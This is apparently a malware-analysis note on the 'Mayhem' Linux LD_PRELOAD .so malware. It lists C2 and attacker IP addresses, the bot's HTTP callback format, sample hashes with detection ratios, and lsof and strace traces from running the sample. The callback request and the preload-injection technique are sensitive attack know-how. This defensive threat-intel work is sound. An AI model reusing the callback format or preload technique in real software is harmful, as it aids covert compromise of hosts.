- # MalwareMUSTDie! Mayhem (.so ELF malware abusing LD_PRELOAD) installer
- # Case spotted & captured by @yinX, analyzed : @unixfreaxjp
- # CNC: 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
- # Attacker Source;
- $ echo 46.149.111.171 |bash origin.sh
- 46.149.111.171||61214 | 46.149.111.0/24 | VDSINSIDE | UA | VDSINSIDE.COM | ELERIUM LTD
- $
- $ echo 188.165.217.216 |bash origin.sh
- 188.165.217.216|ns312431.ip-188-165-217.eu.|16276 | 188.165.0.0/16 | OVH | FR | OVH.COM | OVH SAS
- $
- $ echo 176.119.3.242 |bash origin.sh
- 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
- # callback format:
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- # Detection ratio in VirusTotal (note: these are NOT Windows binaries, so the detection ratios for them are a VERY reliable, actual figure)
- PHP installer: (6/54) 03c80f6d678857431645e079eeacb21cbe4e37f1a4643814dd7ad67a926d8c2a
- ELF bruteforce.so: (2/54) 3ec6f7201d8578b2befb55652a2c9df25ed0e62ffd8e38f8d9bea23bebfdcf3c
- ELF cmsurls.so: (2/54) 3d07e0fb23d0e498b25bca7f4dd696cf507763242725e98b92178332a112bc36
- ELF atom-aggregator-32.so (16/54) 8983f3a07236bcf24f8db4c4c0cec1ad0042806cbf431500867da01c2f4619d4
- ELF atom-aggregator-64.so (14/54) 77d77eed0cad458fd1f3278d5bb93b8e7073d87f855c9e811cec66abad428b53
- // dropped malware drive:
- -rw-r--r-- 1 12582912 Aug 5 10:25 .cache 74fb94dcf856dbe4e848dbcedb51c419
- # failed to decrypt it...
- // samples:
- MD5 (atom-aggregator-32.so) = 61092c67dd76505ed23434fdad14f26a (this binary analysis)
- MD5 (atom-aggregator-64.so) = af680d137d3fb407ef654a98e2ac7643 (this binary analysis)
- MD5 (bruteforce.so) = ab69765fadcec09e44cc0df06653982e ==> bruters, self explanatory
- MD5 (cmsurls.so) = 720bc891a7468ef5c29eb4da211c142b ==> callbacks: https://gist.github.com/Yinette/082d616453ca574c6a7b
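- // executed, PoC (note the DEL entries in lsof: the .so is already deleted from disk but still mapped into the host process, and the dropped .cache file is mapped as well):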
- mmd@1x111 ~/0x02E/009 $ date
- Tue Aug 5 10:27:46 CEST 2014
- $ lsof |grep atom
- host 18153 mmd DEL REG 9,2 30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
- $ lsof -p 18153
- COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
- host 18153 mmd cwd DIR 9,2 4096 30148960 /home/mmd/0x02E/009
- host 18153 mmd rtd DIR 9,2 4096 2 /
- host 18153 mmd txt REG 9,2 117128 12453326 /usr/bin/host
- host 18153 mmd mem REG 9,2 22928 38797877 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
- host 18153 mmd mem REG 9,2 47616 38797878 /lib/x86_64-linux-gnu/libnss_files-2.13.so
- host 18153 mmd mem REG 9,2 12582912 30149146 /home/mmd/0x02E/009/.cache
- host 18153 mmd mem REG 9,2 93208 12455541 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
- host 18153 mmd mem REG 9,2 530736 38797873 /lib/x86_64-linux-gnu/libm-2.13.so
- host 18153 mmd mem REG 9,2 141784 38797700 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
- host 18153 mmd mem REG 9,2 18672 38797775 /lib/x86_64-linux-gnu/libattr.so.1.1.0
- host 18153 mmd mem REG 9,2 34840 12456099 /usr/lib/libisccc.so.80.0.2
- host 18153 mmd mem REG 9,2 92752 38797727 /lib/x86_64-linux-gnu/libz.so.1.2.7
- host 18153 mmd mem REG 9,2 80712 38797886 /lib/x86_64-linux-gnu/libresolv-2.13.so
- host 18153 mmd mem REG 9,2 14320 38797702 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
- host 18153 mmd mem REG 9,2 35400 12455796 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
- host 18153 mmd mem REG 9,2 14672 38797691 /lib/x86_64-linux-gnu/libcom_err.so.2.1
- host 18153 mmd mem REG 9,2 162632 12455436 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
- host 18153 mmd mem REG 9,2 868096 12455510 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
- host 18153 mmd mem REG 9,2 219192 12451949 /usr/lib/libGeoIP.so.1.4.8
- host 18153 mmd mem REG 9,2 1599536 38797824 /lib/x86_64-linux-gnu/libc-2.13.so
- host 18153 mmd mem REG 9,2 1436984 12455509 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
- host 18153 mmd mem REG 9,2 131107 38797884 /lib/x86_64-linux-gnu/libpthread-2.13.so
- host 18153 mmd mem REG 9,2 17112 38797717 /lib/x86_64-linux-gnu/libcap.so.2.22
- host 18153 mmd mem REG 9,2 14768 38797839 /lib/x86_64-linux-gnu/libdl-2.13.so
- host 18153 mmd mem REG 9,2 368072 12453396 /usr/lib/libisc.so.84.1.0
- host 18153 mmd mem REG 9,2 139616 12452611 /usr/lib/libisccfg.so.82.0.3
- host 18153 mmd mem REG 9,2 51048 12452613 /usr/lib/libbind9.so.80.0.7
- host 18153 mmd mem REG 9,2 2048480 12455516 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
- host 18153 mmd mem REG 9,2 257288 12455485 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
- host 18153 mmd mem REG 9,2 1674552 12452609 /usr/lib/libdns.so.88.1.1
- host 18153 mmd mem REG 9,2 75752 12455394 /usr/lib/liblwres.so.80.0.3
- host 18153 mmd DEL REG 9,2 30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
- host 18153 mmd mem REG 9,2 136936 38797728 /lib/x86_64-linux-gnu/ld-2.13.so
- host 18153 mmd 0r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 1r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 2r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 3r CHR 1,3 0t0 1027 /dev/null
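- // patch to debug (syscall trace of /usr/bin/host; the .so is opened before /etc/ld.so.preload is checked, and that file does not exist, so the preload comes from the LD_PRELOAD environment variable rather than from that file):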
- execve("/usr/bin/host", ["/usr/bin/host"], [/* 20 vars */]) = 0
- brk(0) = 0x7f57dd0d4000
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0bf000
- open("./atom-aggregator-64.so", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x\23\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
- getcwd("/home/mmd/0x02E/009", 128) = 20
- mmap(NULL, 2151928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57dac94000
- mprotect(0x7f57dac9b000, 2093056, PROT_NONE) = 0
- mmap(0x7f57dae9a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f57dae9a000
- mmap(0x7f57dae9b000, 26104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57dae9b000
- mprotect(0x7fff5d64a000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
- close(3) = 0
- access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- open("/etc/ld.so.cache", O_RDONLY) = 3
- fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f57db0b1000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/liblwres.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P6\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=75752, ...}) = 0
- mmap(NULL, 2171040, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57daa81000
- mprotect(0x7f57daa93000, 2093056, PROT_NONE) = 0
- mmap(0x7f57dac92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x11000) = 0x7f57dac92000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libdns.so.88", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\244\2\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=1674552, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0b0000
- mmap(NULL, 3773136, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da6e7000
- mprotect(0x7f57da879000, 2093056, PROT_NONE) = 0
- mmap(0x7f57daa78000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x191000) = 0x7f57daa78000
- mmap(0x7f57daa80000, 720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57daa80000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\266\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=257288, ...}) = 0
- mmap(NULL, 2353120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da4a8000
- mprotect(0x7f57da4e4000, 2097152, PROT_NONE) = 0
- mmap(0x7f57da6e4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3c000) = 0x7f57da6e4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\207\7\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=2048480, ...}) = 0
- mmap(NULL, 4158808, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da0b0000
- mprotect(0x7f57da27a000, 2097152, PROT_NONE) = 0
- mmap(0x7f57da47a000, 172032, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7f57da47a000
- mmap(0x7f57da4a4000, 13656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57da4a4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libbind9.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340-\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=51048, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0af000
- mmap(NULL, 2146352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9ea3000
- mprotect(0x7f57d9eaf000, 2093056, PROT_NONE) = 0
- mmap(0x7f57da0ae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7f57da0ae000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisccfg.so.82", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\355\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=139616, ...}) = 0
- mmap(NULL, 2238208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9c80000
- mprotect(0x7f57d9c9b000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d9e9b000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b000) = 0x7f57d9e9b000
- mmap(0x7f57d9ea2000, 1792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9ea2000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisc.so.84", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360\374\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=368072, ...}) = 0
- mmap(NULL, 2464112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9a26000
- mprotect(0x7f57d9a7e000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9c7d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x57000) = 0x7f57d9c7d000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\r\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14768, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ae000
- mmap(NULL, 2109696, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9822000
- mprotect(0x7f57d9824000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d9a24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d9a24000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libcap.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\26\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=17112, ...}) = 0
- mmap(NULL, 2112384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d961e000
- mprotect(0x7f57d9622000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9821000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d9821000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@\\\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=131107, ...}) = 0
- mmap(NULL, 2208672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9402000
- mprotect(0x7f57d9419000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9618000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7f57d9618000
- mmap(0x7f57d961a000, 13216, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d961a000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libxml2.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\377\2\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=1436984, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ad000
- mmap(NULL, 3537400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d90a2000
- mprotect(0x7f57d91f7000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d93f7000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155000) = 0x7f57d93f7000
- mmap(0x7f57d9401000, 2552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9401000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8d17000
- mprotect(0x7f57d8e99000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9098000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f57d9098000
- mmap(0x7f57d909d000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d909d000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libGeoIP.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0c\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=219192, ...}) = 0
- mmap(NULL, 2314592, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8ae1000
- mprotect(0x7f57d8b15000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d8d14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x33000) = 0x7f57d8d14000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\310\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=868096, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ac000
- mmap(NULL, 2963968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d880d000
- mprotect(0x7f57d88d6000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d8ad5000, 49152, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xc8000) = 0x7f57d8ad5000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360H\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=162632, ...}) = 0
- mmap(NULL, 2261424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d85e4000
- mprotect(0x7f57d860a000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d880a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f57d880a000
- mmap(0x7f57d880c000, 432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d880c000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\26\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14672, ...}) = 0
- mmap(NULL, 2109928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d83e0000
- mprotect(0x7f57d83e3000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d85e2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d85e2000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240%\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=35400, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ab000
- mmap(NULL, 2130800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d81d7000
- mprotect(0x7f57d81df000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d83de000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d83de000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\22\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14320, ...}) = 0
- mmap(NULL, 2109456, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7fd3000
- mprotect(0x7f57d7fd6000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d81d5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d81d5000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3008\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=80712, ...}) = 0
- mmap(NULL, 2185864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7dbd000
- mprotect(0x7f57d7dd0000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7f57d7fcf000
- mmap(0x7f57d7fd1000, 6792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d7fd1000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340#\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=92752, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0aa000
- mmap(NULL, 2187792, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7ba6000
- mprotect(0x7f57d7bbc000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7dbb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7f57d7dbb000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisccc.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320'\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=34840, ...}) = 0
- mmap(NULL, 2130208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d799d000
- mprotect(0x7f57d79a5000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7ba4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d7ba4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libattr.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\25\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=18672, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a9000
- mmap(NULL, 2113880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7798000
- mprotect(0x7f57d779c000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d799b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d799b000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360,\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=141784, ...}) = 0
- mmap(NULL, 2236904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7575000
- mprotect(0x7f57d7597000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7796000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x21000) = 0x7f57d7796000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360>\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=530736, ...}) = 0
- mmap(NULL, 2625768, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d72f3000
- mprotect(0x7f57d7374000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7573000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x80000) = 0x7f57d7573000
- close(3) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a8000
